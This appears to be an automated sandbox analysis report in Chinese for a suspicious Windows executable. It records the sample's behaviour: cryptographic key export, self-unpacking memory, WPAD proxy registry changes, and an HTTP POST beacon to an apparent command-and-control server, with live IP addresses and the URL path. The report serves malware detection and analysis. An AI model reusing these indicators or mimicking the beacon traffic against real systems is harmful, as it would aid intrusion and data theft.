5.6
高危
该样本未表现出任何异常!
重新分析
更多

9dade744156b4bf0c64bb9dadc79bc7734ab291a6bcd5c6bc45fdc2e4d341e0f

a006ed72a1635770a9d729ec0c8729a2.exe

分析耗时

88s

最近分析

文件大小

504.0KB
静态报毒 动态报毒
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
未检测 暂无反病毒引擎检测结果
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1620998375.933375
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1620998366.855375
CryptGenKey
crypto_handle: 0x005b62f0
algorithm_identifier: 0x0000660e ()
provider_handle: 0x005b5cb8
flags: 1
key: f^£†SÝdÙ£ìބtƒl£
success 1 0
1620998375.949375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤+‹kMÏAŒfý÷¶‹ædYn´‰@˜:ã1»š›Ù–Ø^æoT¯bfj=yOxkèý”8‹zM/Ðt¤·%“ñ eEÞÈ,áݛÇó˜U–ÏébP·Œ
blob_type: 1
flags: 64
success 1 0
1620998410.839375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤s DüÆOÙL&îŸí¸fQêñ2aejB&þ¼˜ü4Ú)è¥È1V[£âq•³Y÷üBl¯„«N ζ°õ¯U&ú97²@;Ã,œ<GVj°ûoX¥@—åø°>Wéš5„
blob_type: 1
flags: 64
success 1 0
1620998416.418375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤¤9>”[pÖ#ß,åŒÑK6>$¦=… N¹»p$y‹n{æi8®:’Bוý÷I¤i…qÎÞÀ²ð’’©+cµ ¬‰qӜhÄØ4¸R_µö)= MF=
blob_type: 1
flags: 64
success 1 0
1620998419.871375
CryptExportKey
crypto_handle: 0x005b62f0
crypto_export_handle: 0x005b5d80
buffer: f¤}šíÆõQ›ÚÀàñL4•©‰©Ë¹¸Íðü(³†ûÀl^* °®Ëí¬dµ*íRa@ÿùÁäÀBÉw /<c¾3xÙ4‡¿3,¾E’KôŲ& w#Ôښ¼¹³o­Š;‡
blob_type: 1
flags: 64
success 1 0
This executable has a PDB path (1 个事件)
pdb_path c:\Users\Mr.Anderson\Desktop\2005\27.8.20\CMapEditorCtrl_Demo\Release\MapEd.pdb
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1620998365.980375
NtAllocateVirtualMemory
process_identifier: 784
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00660000
success 0 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620998376.511375
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process a006ed72a1635770a9d729ec0c8729a2.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1620998376.121375
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (5 个事件)
host 134.209.193.138
host 162.144.42.60
host 172.217.24.14
host 24.26.151.3
host 68.183.233.80
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: ’Êé‹H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003b8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620998379.074375
RegSetValueExW
key_handle: 0x000003b8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: ’Êé‹H×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620998379.074375
RegSetValueExA
key_handle: 0x000003d0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620998379.105375
RegSetValueExW
key_handle: 0x000003b4
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 个事件)
dead_host 162.144.42.60:8080
dead_host 192.168.56.101:49178
dead_host 24.26.151.3:80
dead_host 68.183.233.80:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-28 14:21:52

Imports

Library KERNEL32.dll:
0x4500f0 GetFileTime
0x4500f4 GetTickCount
0x4500f8 TerminateProcess
0x450104 IsDebuggerPresent
0x450108 RaiseException
0x45010c RtlUnwind
0x450110 HeapAlloc
0x450114 HeapFree
0x450118 HeapReAlloc
0x45011c VirtualProtect
0x450120 GetSystemInfo
0x450124 VirtualQuery
0x450128 GetCommandLineA
0x45012c GetProcessHeap
0x450130 GetStartupInfoA
0x450134 HeapSize
0x450138 Sleep
0x45013c GetACP
0x450140 LCMapStringA
0x450144 LCMapStringW
0x450148 VirtualFree
0x45014c HeapDestroy
0x450150 GetFileAttributesA
0x450154 GetStdHandle
0x450168 SetHandleCount
0x45016c GetFileType
0x450178 GetStringTypeA
0x45017c GetStringTypeW
0x450184 GetConsoleCP
0x450188 GetConsoleMode
0x45018c SetStdHandle
0x450190 WriteConsoleA
0x450194 GetConsoleOutputCP
0x450198 WriteConsoleW
0x4501a4 SetErrorMode
0x4501a8 CreateFileA
0x4501ac GetFullPathNameA
0x4501b4 FindFirstFileA
0x4501b8 FindClose
0x4501bc GetCurrentProcess
0x4501c0 DuplicateHandle
0x4501c4 GetFileSize
0x4501c8 SetEndOfFile
0x4501cc UnlockFile
0x4501d0 LockFile
0x4501d4 FlushFileBuffers
0x4501d8 SetFilePointer
0x4501dc WriteFile
0x4501e0 ReadFile
0x4501ec GetThreadLocale
0x4501f0 GetOEMCP
0x4501f4 GetCPInfo
0x4501fc GlobalFlags
0x450200 TlsFree
0x450208 LocalReAlloc
0x45020c TlsSetValue
0x450210 TlsAlloc
0x450218 GlobalHandle
0x45021c GlobalReAlloc
0x450224 TlsGetValue
0x45022c LocalAlloc
0x450230 GetCurrentProcessId
0x450234 CloseHandle
0x450238 GetCurrentThread
0x450240 GetModuleFileNameA
0x450248 GetLocaleInfoA
0x45024c lstrcmpA
0x450254 GetModuleFileNameW
0x450258 GlobalFree
0x45025c GlobalAlloc
0x450260 GlobalLock
0x450264 GlobalUnlock
0x450268 FormatMessageA
0x45026c LocalFree
0x450270 MulDiv
0x450274 FreeResource
0x450278 GetCurrentThreadId
0x45027c GlobalGetAtomNameA
0x450280 GlobalAddAtomA
0x450284 GlobalFindAtomA
0x450288 GlobalDeleteAtom
0x45028c FreeLibrary
0x450290 LoadLibraryA
0x450294 SetLastError
0x450298 lstrcmpW
0x45029c GetModuleHandleA
0x4502a0 GetProcAddress
0x4502a4 GetVersionExA
0x4502a8 lstrlenA
0x4502ac CompareStringW
0x4502b0 CompareStringA
0x4502b4 GetVersion
0x4502b8 MultiByteToWideChar
0x4502bc InterlockedExchange
0x4502c0 VirtualAlloc
0x4502c4 GetLastError
0x4502c8 ExitProcess
0x4502cc WideCharToMultiByte
0x4502d0 FindResourceA
0x4502d4 LoadResource
0x4502d8 LockResource
0x4502dc HeapCreate
0x4502e0 SizeofResource
Library USER32.dll:
0x450340 IsRectEmpty
0x450344 SetRect
0x450348 InvalidateRgn
0x45034c GetNextDlgGroupItem
0x450350 MessageBeep
0x450358 SetParent
0x45035c GetDCEx
0x450360 LockWindowUpdate
0x450364 PostThreadMessageA
0x450368 SetRectEmpty
0x45036c IsZoomed
0x450374 MapDialogRect
0x450378 GetDesktopWindow
0x450380 GetNextDlgTabItem
0x450384 EndDialog
0x45038c SetCursor
0x450390 GetMessageA
0x450394 TranslateMessage
0x450398 GetActiveWindow
0x45039c ValidateRect
0x4503a0 PostQuitMessage
0x4503a4 InflateRect
0x4503a8 EndPaint
0x4503ac BeginPaint
0x4503b0 GetWindowDC
0x4503b4 ClientToScreen
0x4503b8 GrayStringA
0x4503bc DrawTextExA
0x4503c0 DrawTextA
0x4503c4 TabbedTextOutA
0x4503c8 IsWindowEnabled
0x4503cc MoveWindow
0x4503d0 SetWindowTextA
0x4503d4 IsDialogMessageA
0x4503d8 SetDlgItemInt
0x4503dc GetDlgItemInt
0x4503e0 SetMenuItemBitmaps
0x4503e8 ModifyMenuA
0x4503ec CharNextA
0x4503f0 EnableMenuItem
0x4503f4 CheckMenuItem
0x4503fc SendDlgItemMessageA
0x450400 WinHelpA
0x450404 IsChild
0x450408 GetCapture
0x45040c SetWindowsHookExA
0x450410 CallNextHookEx
0x450414 GetClassLongA
0x450418 GetClassNameA
0x45041c SetPropA
0x450420 GetPropA
0x450424 RemovePropA
0x450428 GetFocus
0x45042c IsWindow
0x450430 SetFocus
0x450434 GetWindowTextA
0x450438 GetForegroundWindow
0x45043c GetLastActivePopup
0x450440 SetActiveWindow
0x450444 DispatchMessageA
0x450448 BeginDeferWindowPos
0x45044c EndDeferWindowPos
0x450450 GetDlgItem
0x450454 GetTopWindow
0x450458 DestroyWindow
0x45045c UnhookWindowsHookEx
0x450460 GetMessageTime
0x450464 GetMessagePos
0x450468 PeekMessageA
0x45046c MapWindowPoints
0x450470 GetKeyState
0x450474 GetScrollRange
0x450478 SetScrollPos
0x45047c GetScrollPos
0x450480 SetForegroundWindow
0x450484 ShowScrollBar
0x450488 IsWindowVisible
0x45048c UpdateWindow
0x450490 GetMenu
0x450494 PostMessageA
0x450498 GetSubMenu
0x45049c GetMenuItemID
0x4504a0 DrawStateA
0x4504a4 EqualRect
0x4504a8 DrawFocusRect
0x4504ac GetClientRect
0x4504b0 ScreenToClient
0x4504b4 GetDC
0x4504b8 GetMenuItemCount
0x4504bc GetClassInfoExA
0x4504c0 RegisterClassA
0x4504c4 GetSysColor
0x4504c8 AdjustWindowRectEx
0x4504cc GetParent
0x4504d0 DeferWindowPos
0x4504d4 CopyRect
0x4504d8 GetScrollInfo
0x4504dc SetScrollInfo
0x4504e0 PtInRect
0x4504e4 GetDlgCtrlID
0x4504e8 ReleaseCapture
0x4504ec WindowFromPoint
0x4504f0 CallWindowProcA
0x4504f4 GetWindowLongA
0x4504f8 SetCapture
0x4504fc UnregisterClassA
0x450500 DestroyMenu
0x450504 GetMenuState
0x450508 ReleaseDC
0x45050c EnableScrollBar
0x450510 SetTimer
0x450514 KillTimer
0x450518 EnableWindow
0x45051c LoadCursorA
0x450520 GetCursorPos
0x450524 GetSysColorBrush
0x450528 DefWindowProcA
0x45052c GetClassInfoA
0x450530 InSendMessage
0x450534 CreateWindowExA
0x450538 SendMessageA
0x45053c ShowWindow
0x450540 MessageBoxA
0x450544 LoadStringA
0x450548 DrawIcon
0x45054c IsIconic
0x450550 InvalidateRect
0x450554 LoadIconA
0x450558 GetSystemMetrics
0x45055c LoadBitmapA
0x450560 CharUpperA
0x450564 GetWindow
0x450568 GetWindowRect
0x45056c GetWindowPlacement
0x450574 IntersectRect
0x450578 OffsetRect
0x45057c SetWindowPos
0x450580 SetWindowLongA
Library GDI32.dll:
0x450030 ExtSelectClipRgn
0x450034 DeleteDC
0x450038 CreatePatternBrush
0x45003c GetStockObject
0x450040 ScaleWindowExtEx
0x450048 SetRectRgn
0x45004c CombineRgn
0x450050 GetMapMode
0x450054 PatBlt
0x450058 GetTextMetricsA
0x450060 GetBkColor
0x450064 GetTextColor
0x450068 GetRgnBox
0x45006c GetWindowExtEx
0x450070 GetViewportExtEx
0x450074 SetWindowExtEx
0x450078 ScaleViewportExtEx
0x45007c SetViewportExtEx
0x450080 OffsetViewportOrgEx
0x450084 SetViewportOrgEx
0x450088 Escape
0x45008c ExtTextOutA
0x450090 TextOutA
0x450094 RectVisible
0x450098 PtVisible
0x45009c CreatePen
0x4500a0 CreateRectRgn
0x4500a4 SelectClipRgn
0x4500a8 DeleteObject
0x4500ac IntersectClipRect
0x4500b0 ExcludeClipRect
0x4500b4 SetMapMode
0x4500b8 RestoreDC
0x4500bc SaveDC
0x4500c0 GetDeviceCaps
0x4500c4 CreateBitmap
0x4500c8 GetObjectA
0x4500cc SetBkColor
0x4500d0 SetTextColor
0x4500d4 GetClipBox
0x4500d8 BitBlt
0x4500dc Polyline
0x4500e0 SelectObject
0x4500e4 CreateCompatibleDC
Library MSIMG32.dll:
0x4502e8 TransparentBlt
Library comdlg32.dll:
0x450598 GetFileTitleA
Library WINSPOOL.DRV:
0x450588 DocumentPropertiesA
0x45058c OpenPrinterA
0x450590 ClosePrinter
Library ADVAPI32.dll:
0x450000 RegEnumKeyA
0x450004 RegSetValueExA
0x450008 RegCreateKeyExA
0x45000c RegQueryValueA
0x450010 RegCloseKey
0x450014 RegDeleteKeyA
0x450018 RegOpenKeyExA
0x45001c RegQueryValueExA
0x450020 RegOpenKeyA
Library COMCTL32.dll:
0x450028
Library SHLWAPI.dll:
0x450328 PathFindFileNameA
0x45032c PathStripToRootA
0x450330 PathFindExtensionA
0x450334 PathIsUNCA
Library oledlg.dll:
0x4505e0
Library ole32.dll:
0x4505a0 OleInitialize
0x4505a8 OleUninitialize
0x4505b8 CoGetClassObject
0x4505bc CLSIDFromString
0x4505c0 CoRevokeClassObject
0x4505c4 CoTaskMemAlloc
0x4505c8 CoTaskMemFree
0x4505d0 OleFlushClipboard
0x4505d8 CLSIDFromProgID
Library OLEAUT32.dll:
0x4502f0 VariantChangeType
0x4502f4 VariantInit
0x4502f8 SysAllocStringLen
0x4502fc SysStringLen
0x450300 SysFreeString
0x450308 VariantCopy
0x45030c VariantClear
0x450310 SafeArrayDestroy
0x450320 SysAllocString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 134.209.193.138 443

UDP

Source Source Port Destination Destination Port
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49238 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62319 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://134.209.193.138:443/krvfYI0FI0F/HUOnGVZI0DSF/BY0PTCm/OB2Ym8Yhxa95lNu34GI/ 
POST /krvfYI0FI0F/HUOnGVZI0DSF/BY0PTCm/OB2Ym8Yhxa95lNu34GI/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------1d4f49aa4b5964861f9e41b3765efa27
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 134.209.193.138:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.